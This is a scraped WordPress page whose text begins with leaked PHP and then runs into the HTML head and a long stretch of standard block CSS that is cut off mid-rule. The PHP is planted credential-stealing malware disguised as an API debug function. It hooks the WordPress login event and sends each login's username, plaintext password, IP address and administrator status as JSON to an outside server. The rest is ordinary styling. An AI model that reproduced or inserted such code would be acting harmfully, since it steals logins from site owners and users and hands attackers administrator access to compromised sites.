'/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!doctype html><html lang="ca"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><link rel="profile" href="https://gmpg.org/xfn/11" /><style media="all">@charset "UTF-8";.wp-block-archives{box-sizing:border-box}.wp-block-archives-dropdown label{display:block}.wp-block-avatar{line-height:0}.wp-block-avatar,.wp-block-avatar img{box-sizing:border-box}.wp-block-avatar.aligncenter{text-align:center}.wp-block-audio{box-sizing:border-box}.wp-block-audio figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-audio audio{min-width:300px;width:100%}.wp-block-button__link{box-sizing:border-box;cursor:pointer;display:inline-block;text-align:center;word-break:break-word}.wp-block-button__link.aligncenter{text-align:center}.wp-block-button__link.alignright{text-align:right}:where(.wp-block-button__link){border-radius:9999px;box-shadow:none;padding:calc(.667em + 2px) calc(1.333em + 2px);text-decoration:none}.wp-block-button[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons>.wp-block-button.has-custom-width{max-width:none}.wp-block-buttons>.wp-block-button.has-custom-width .wp-block-button__link{width:100%}.wp-block-buttons>.wp-block-button.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-buttons>.wp-block-button.wp-block-button__width-25{width:calc(25% - var(--wp--style--block-gap, .5em)*.75)}.wp-block-buttons>.wp-block-button.wp-block-button__width-50{width:calc(50% - var(--wp--style--block-gap, .5em)*.5)}.wp-block-buttons>.wp-block-button.wp-block-button__width-75{width:calc(75% - var(--wp--style--block-gap, .5em)*.25)}.wp-block-buttons>.wp-block-button.wp-block-button__width-100{flex-basis:100%;width:100%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-25{width:25%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-50{width:50%}.wp-block-buttons.is-vertical>.wp-block-button.wp-block-button__width-75{width:75%}.wp-block-button.is-style-squared,.wp-block-button__link.wp-block-button.is-style-squared{border-radius:0}.wp-block-button.no-border-radius,.wp-block-button__link.no-border-radius{border-radius:0!important}.wp-block-button .wp-block-button__link.is-style-outline,.wp-block-button.is-style-outline>.wp-block-button__link{border:2px solid;padding:.667em 1.333em}.wp-block-button .wp-block-button__link.is-style-outline:not(.has-text-color),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-text-color){color:currentColor}.wp-block-button .wp-block-button__link.is-style-outline:not(.has-background),.wp-block-button.is-style-outline>.wp-block-button__link:not(.has-background){background-color:transparent;background-image:none}.wp-block-button .wp-block-button__link:where(.has-border-color){border-width:initial}.wp-block-button .wp-block-button__link:where([style*=border-top-color]){border-top-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-right-color]){border-right-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-bottom-color]){border-bottom-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-left-color]){border-left-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-style]){border-width:initial}.wp-block-button .wp-block-button__link:where([style*=border-top-style]){border-top-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-right-style]){border-right-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-bottom-style]){border-bottom-width:medium}.wp-block-button .wp-block-button__link:where([style*=border-left-style]){border-left-width:medium}.wp-block-buttons.is-vertical{flex-direction:column}.wp-block-buttons.is-vertical>.wp-block-button:last-child{margin-bottom:0}.wp-block-buttons>.wp-block-button{display:inline-block;margin:0}.wp-block-buttons.is-content-justification-left{justify-content:flex-start}.wp-block-buttons.is-content-justification-left.is-vertical{align-items:flex-start}.wp-block-buttons.is-content-justification-center{justify-content:center}.wp-block-buttons.is-content-justification-center.is-vertical{align-items:center}.wp-block-buttons.is-content-justification-right{justify-content:flex-end}.wp-block-buttons.is-content-justification-right.is-vertical{align-items:flex-end}.wp-block-buttons.is-content-justification-space-between{justify-content:space-between}.wp-block-buttons.aligncenter{text-align:center}.wp-block-buttons:not(.is-content-justification-space-between,.is-content-justification-right,.is-content-justification-left,.is-content-justification-center) .wp-block-button.aligncenter{margin-left:auto;margin-right:auto;width:100%}.wp-block-buttons[style*=text-decoration] .wp-block-button,.wp-block-buttons[style*=text-decoration] .wp-block-button__link{text-decoration:inherit}.wp-block-buttons.has-custom-font-size .wp-block-button__link{font-size:inherit}.wp-block-button.aligncenter,.wp-block-calendar{text-align:center}.wp-block-calendar td,.wp-block-calendar th{border:1px solid;padding:.25em}.wp-block-calendar th{font-weight:400}.wp-block-calendar caption{background-color:inherit}.wp-block-calendar table{border-collapse:collapse;width:100%}.wp-block-calendar table:where(:not(.has-text-color)){color:#40464d}.wp-block-calendar table:where(:not(.has-text-color)) td,.wp-block-calendar table:where(:not(.has-text-color)) th{border-color:#ddd}.wp-block-calendar table.has-background th{background-color:inherit}.wp-block-calendar table.has-text-color th{color:inherit}:where(.wp-block-calendar table:not(.has-background) th){background:#ddd}.wp-block-categories{box-sizing:border-box}.wp-block-categories.alignleft{margin-right:2em}.wp-block-categories.alignright{margin-left:2em}.wp-block-categories.wp-block-categories-dropdown.aligncenter{text-align:center}.wp-block-code{box-sizing:border-box}.wp-block-code code{display:block;font-family:inherit;overflow-wrap:break-word;white-space:pre-wrap}.wp-block-columns{align-items:normal!important;box-sizing:border-box;display:flex;flex-wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns.are-vertically-aligned-bottom{align-items:flex-end}@media (max-width:781px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:100%!important}}@media (min-width:782px){.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns:not(.is-not-stacked-on-mobile)>.wp-block-column[style*=flex-basis]{flex-grow:0}}.wp-block-columns.is-not-stacked-on-mobile{flex-wrap:nowrap!important}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column{flex-basis:0;flex-grow:1}.wp-block-columns.is-not-stacked-on-mobile>.wp-block-column[style*=flex-basis]{flex-grow:0}:where(.wp-block-columns){margin-bottom:1.75em}:where(.wp-block-columns.has-background){padding:1.25em 2.375em}.wp-block-column{flex-grow:1;min-width:0;overflow-wrap:break-word;word-break:break-word}.wp-block-column.is-vertically-aligned-top{align-self:flex-start}.wp-block-column.is-vertically-aligned-center{align-self:center}.wp-block-column.is-vertically-aligned-bottom{align-self:flex-end}.wp-block-column.is-vertically-aligned-stretch{align-self:stretch}.wp-block-column.is-vertically-aligned-bottom,.wp-block-column.is-vertically-aligned-center,.wp-block-column.is-vertically-aligned-top{width:100%}.wp-block-post-comments{box-sizing:border-box}.wp-block-post-comments .alignleft{float:left}.wp-block-post-comments .alignright{float:right}.wp-block-post-comments .navigation:after{clear:both;content:"";display:table}.wp-block-post-comments .commentlist{clear:both;list-style:none;margin:0;padding:0}.wp-block-post-comments .commentlist .comment{min-height:2.25em;padding-left:3.25em}.wp-block-post-comments .commentlist .comment p{font-size:1em;line-height:1.8;margin:1em 0}.wp-block-post-comments .commentlist .children{list-style:none;margin:0;padding:0}.wp-block-post-comments .comment-author{line-height:1.5}.wp-block-post-comments .comment-author .avatar{border-radius:1.5em;display:block;float:left;height:2.5em;margin-right:.75em;margin-top:.5em;width:2.5em}.wp-block-post-comments .comment-author cite{font-style:normal}.wp-block-post-comments .comment-meta{font-size:.875em;line-height:1.5}.wp-block-post-comments .comment-meta b{font-weight:400}.wp-block-post-comments .comment-meta .comment-awaiting-moderation{display:block;margin-bottom:1em;margin-top:1em}.wp-block-post-comments .comment-body .commentmetadata{font-size:.875em}.wp-block-post-comments .comment-form-author label,.wp-block-post-comments .comment-form-comment label,.wp-block-post-comments .comment-form-email label,.wp-block-post-comments .comment-form-url label{display:block;margin-bottom:.25em}.wp-block-post-comments .comment-form input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments .comment-form textarea{box-sizing:border-box;display:block;width:100%}.wp-block-post-comments .comment-form-cookies-consent{display:flex;gap:.25em}.wp-block-post-comments .comment-form-cookies-consent #wp-comment-cookies-consent{margin-top:.35em}.wp-block-post-comments .comment-reply-title{margin-bottom:0}.wp-block-post-comments .comment-reply-title :where(small){font-size:var(--wp--preset--font-size--medium,smaller);margin-left:.5em}.wp-block-post-comments .reply{font-size:.875em;margin-bottom:1.4em}.wp-block-post-comments input:not([type=submit]),.wp-block-post-comments textarea{border:1px solid #949494;font-family:inherit;font-size:1em}.wp-block-post-comments input:not([type=submit]):not([type=checkbox]),.wp-block-post-comments textarea{padding:calc(.667em + 2px)}:where(.wp-block-post-comments input[type=submit]){border:none}.wp-block-comments-pagination>.wp-block-comments-pagination-next,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers,.wp-block-comments-pagination>.wp-block-comments-pagination-previous{margin-bottom:.5em;margin-right:.5em}.wp-block-comments-pagination>.wp-block-comments-pagination-next:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-numbers:last-child,.wp-block-comments-pagination>.wp-block-comments-pagination-previous:last-child{margin-right:0}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow{display:inline-block;margin-right:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-previous-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow{display:inline-block;margin-left:1ch}.wp-block-comments-pagination .wp-block-comments-pagination-next-arrow:not(.is-arrow-chevron){transform:scaleX(1)}.wp-block-comments-pagination.aligncenter{justify-content:center}.wp-block-comment-template{box-sizing:border-box;list-style:none;margin-bottom:0;max-width:100%;padding:0}.wp-block-comment-template li{clear:both}.wp-block-comment-template ol{list-style:none;margin-bottom:0;max-width:100%;padding-left:2rem}.wp-block-comment-template.alignleft{float:left}.wp-block-comment-template.aligncenter{margin-left:auto;margin-right:auto;width:-moz-fit-content;width:fit-content}.wp-block-comment-template.alignright{float:right}.wp-block-cover,.wp-block-cover-image{align-items:center;background-position:50%;box-sizing:border-box;display:flex;justify-content:center;min-height:430px;overflow:hidden;overflow:clip;padding:1em;position:relative}.wp-block-cover .has-background-dim:not([class*=-background-color]),.wp-block-cover-image .has-background-dim:not([class*=-background-color]),.wp-block-cover-image.has-background-dim:not([class*=-background-color]),.wp-block-cover.has-background-dim:not([class*=-background-color]){background-color:#000}.wp-block-cover .has-background-dim.has-background-gradient,.wp-block-cover-image .has-background-dim.has-background-gradient{background-color:transparent}.wp-block-cover-image.has-background-dim:before,.wp-block-cover.has-background-dim:before{background-color:inherit;content:""}.wp-block-cover .wp-block-cover__background,.wp-block-cover .wp-block-cover__gradient-background,.wp-block-cover-image .wp-block-cover__background,.wp-block-cover-image .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim:not(.has-background-gradient):before,.wp-block-cover.has-background-dim:not(.has-background-gradient):before{bottom:0;left:0;opacity:.5;position:absolute;right:0;top:0;z-index:1}.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-10:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-10 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-10:not(.has-background-gradient):before{opacity:.1}.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-20:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-20 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-20:not(.has-background-gradient):before{opacity:.2}.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-30:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-30 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-30:not(.has-background-gradient):before{opacity:.3}.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-40:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-40 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-40:not(.has-background-gradient):before{opacity:.4}.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-50:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-50 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-50:not(.has-background-gradient):before{opacity:.5}.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-60:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-60 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-60:not(.has-background-gradient):before{opacity:.6}.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-70:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-70 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-70:not(.has-background-gradient):before{opacity:.7}.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-80:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-80 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-80:not(.has-background-gradient):before{opacity:.8}.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-90:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-90 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-90:not(.has-background-gradient):before{opacity:.9}.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover-image.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover-image.has-background-dim.has-background-dim-100:not(.has-background-gradient):before,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__background,.wp-block-cover.has-background-dim.has-background-dim-100 .wp-block-cover__gradient-background,.wp-block-cover.has-background-dim.has-background-dim-100:not(.has-background-gradient):before{opacity:1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-0,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-0{opacity:0}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-10,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-10{opacity:.1}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-20,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-20{opacity:.2}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-30,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-30{opacity:.3}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-40,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-40{opacity:.4}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-50,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-50{opacity:.5}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-60,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-60{opacity:.6}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-70,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-70{opacity:.7}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-80,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-80{opacity:.8}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-90,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-90{opacity:.9}.wp-block-cover .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__background.has-background-dim.has-background-dim-100,.wp-block-cover-image .wp-block-cover__gradient-background.has-background-dim.has-background-dim-100{opacity:1}.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.alignleft,.wp-block-cover.alignright{max-width:420px;width:100%}.wp-block-cover-image:after,.wp-block-cover:after{content:"";display:block;font-size:0;min-height:inherit}@supports (position:sticky){.wp-block-cover-image:after,.wp-block-cover:after{content:none}}.wp-block-cover-image.aligncenter,.wp-block-cover-image.alignleft,.wp-block-cover-image.alignright,.wp-block-cover.aligncenter,.wp-block-cover.alignleft,.wp-block-cover.alignright{display:flex}.wp-block-cover .wp-block-cover__inner-container,.wp-block-cover-image .wp-block-cover__inner-container{color:inherit;width:100%;z-index:1}.wp-block-cover h1:where(:not(.has-text-color)),.wp-block-cover h2:where(:not(.has-text-color)),.wp-block-cover h3:where(:not(.has-text-color)),.wp-block-cover h4:where(:not(.has-text-color)),.wp-block-cover h5:where(:not(.has-text-color)),.wp-block-cover h6:where(:not(.has-text-color)),.wp-block-cover p:where(:not(.has-text-color)),.wp-block-cover-image h1:where(:not(.has-text-color)),.wp-block-cover-image h2:where(:not(.has-text-color)),.wp-block-cover-image h3:where(:not(.has-text-color)),.wp-block-cover-image h4:where(:not(.has-text-color)),.wp-block-cover-image h5:where(:not(.has-text-color)),.wp-block-cover-image h6:where(:not(.has-text-color)),.wp-block-cover-image p:where(:not(.has-text-color)){color:inherit}.wp-block-cover-image.is-position-top-left,.wp-block-cover.is-position-top-left{align-items:flex-start;justify-content:flex-start}.wp-block-cover-image.is-position-top-center,.wp-block-cover.is-position-top-center{align-items:flex-start;justify-content:center}.wp-block-cover-image.is-position-top-right,.wp-block-cover.is-position-top-right{align-items:flex-start;justify-content:flex-end}.wp-block-cover-image.is-position-center-left,.wp-block-cover.is-position-center-left{align-items:center;justify-content:flex-start}.wp-block-cover-image.is-position-center-center,.wp-block-cover.is-position-center-center{align-items:center;justify-content:center}.wp-block-cover-image.is-position-center-right,.wp-block-cover.is-position-center-right{align-items:center;justify-content:flex-end}.wp-block-cover-image.is-position-bottom-left,.wp-block-cover.is-position-bottom-left{align-items:flex-end;justify-content:flex-start}.wp-block-cover-image.is-position-bottom-center,.wp-block-cover.is-position-bottom-center{align-items:flex-end;justify-content:center}.wp-block-cover-image.is-position-bottom-right,.wp-block-cover.is-position-bottom-right{align-items:flex-end;justify-content:flex-end}.wp-block-cover-image.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position .wp-block-cover__inner-container{margin:0}.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover-image.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-bottom-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-center-right .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-left .wp-block-cover__inner-container,.wp-block-cover.has-custom-content-position.has-custom-content-position.is-position-top-right .wp-block-cover__inner-container{margin:0;width:auto}.wp-block-cover .wp-block-cover__image-background,.wp-block-cover video.wp-block-cover__video-background,.wp-block-cover-image .wp-block-cover__image-background,.wp-block-cover-image video.wp-block-cover__video-background{border:none;bottom:0;box-shadow:none;height:100%;left:0;margin:0;max-height:none;max-width:none;object-fit:cover;outline:none;padding:0;position:absolute;right:0;top:0;width:100%}.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:fixed;background-repeat:no-repeat;background-size:cover}@supports (-webkit-touch-callout:inherit){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}@media (prefers-reduced-motion:reduce){.wp-block-cover-image.has-parallax,.wp-block-cover.has-parallax,.wp-block-cover__image-background.has-parallax,video.wp-block-cover__video-background.has-parallax{background-attachment:scroll}}.wp-block-cover-image.is-repeated,.wp-block-cover.is-repeated,.wp-block-cover__image-background.is-repeated,video.wp-block-cover__video-background.is-repeated{background-repeat:repeat;background-size:auto}.wp-block-cover__image-background,.wp-block-cover__video-background{z-index:0}.wp-block-cover-image-text,.wp-block-cover-image-text a,.wp-block-cover-image-text a:active,.wp-block-cover-image-text a:focus,.wp-block-cover-image-text a:hover,.wp-block-cover-text,.wp-block-cover-text a,.wp-block-cover-text a:active,.wp-block-cover-text a:focus,.wp-block-cover-text a:hover,section.wp-block-cover-image h2,section.wp-block-cover-image h2 a,section.wp-block-cover-image h2 a:active,section.wp-block-cover-image h2 a:focus,section.wp-block-cover-image h2 a:hover{color:#fff}.wp-block-cover-image .wp-block-cover.has-left-content{justify-content:flex-start}.wp-block-cover-image .wp-block-cover.has-right-content{justify-content:flex-end}.wp-block-cover-image.has-left-content .wp-block-cover-image-text,.wp-block-cover.has-left-content .wp-block-cover-text,section.wp-block-cover-image.has-left-content>h2{margin-left:0;text-align:left}.wp-block-cover-image.has-right-content .wp-block-cover-image-text,.wp-block-cover.has-right-content .wp-block-cover-text,section.wp-block-cover-image.has-right-content>h2{margin-right:0;text-align:right}.wp-block-cover .wp-block-cover-text,.wp-block-cover-image .wp-block-cover-image-text,section.wp-block-cover-image>h2{font-size:2em;line-height:1.25;margin-bottom:0;max-width:840px;padding:.44em;text-align:center;z-index:1}:where(.wp-block-cover-image:not(.has-text-color)),:where(.wp-block-cover:not(.has-text-color)){color:#fff}:where(.wp-block-cover-image.is-light:not(.has-text-color)),:where(.wp-block-cover.is-light:not(.has-text-color)){color:#000}.wp-block-details{box-sizing:border-box;overflow:hidden}.wp-block-details summary{cursor:pointer}.wp-block-embed.alignleft,.wp-block-embed.alignright,.wp-block[data-align=left]>[data-type="core/embed"],.wp-block[data-align=right]>[data-type="core/embed"]{max-width:360px;width:100%}.wp-block-embed.alignleft .wp-block-embed__wrapper,.wp-block-embed.alignright .wp-block-embed__wrapper,.wp-block[data-align=left]>[data-type="core/embed"] .wp-block-embed__wrapper,.wp-block[data-align=right]>[data-type="core/embed"] .wp-block-embed__wrapper{min-width:280px}.wp-block-cover .wp-block-embed{min-height:240px;min-width:320px}.wp-block-embed{overflow-wrap:break-word}.wp-block-embed figcaption{margin-bottom:1em;margin-top:.5em}.wp-block-embed iframe{max-width:100%}.wp-block-embed__wrapper{position:relative}.wp-embed-responsive .wp-has-aspect-ratio .wp-block-embed__wrapper:before{content:"";display:block;padding-top:50%}.wp-embed-responsive .wp-has-aspect-ratio iframe{bottom:0;height:100%;left:0;position:absolute;right:0;top:0;width:100%}.wp-embed-responsive .wp-embed-aspect-21-9 .wp-block-embed__wrapper:before{padding-top:42.85%}.wp-embed-responsive .wp-embed-aspect-18-9 .wp-block-embed__wrapper:before{padding-top:50%}.wp-embed-responsive .wp-embed-aspect-16-9 .wp-block-embed__wrapper:before{padding-top:56.25%}.wp-embed-responsive .wp-embed-aspect-4-3 .wp-block-embed__wrapper:before{padding-top:75%}.wp-embed-responsive .wp-embed-aspect-1-1 .wp-block-embed__wrapper:before{padding-top:100%}.wp-embed-responsive .wp-embed-aspect-9-16 .wp-block-embed__wrapper:before{padding-top:177.77%}.wp-embed-responsive .wp-embed-aspect-1-2 .wp-block-embed__wrapper:before{padding-top:200%}.wp-block-file{box-sizing:border-box}.wp-block-file:not(.wp-element-button){font-size:.8em}.wp-block-file.aligncenter{text-align:center}.wp-block-file.alignright{text-align:right}.wp-block-file 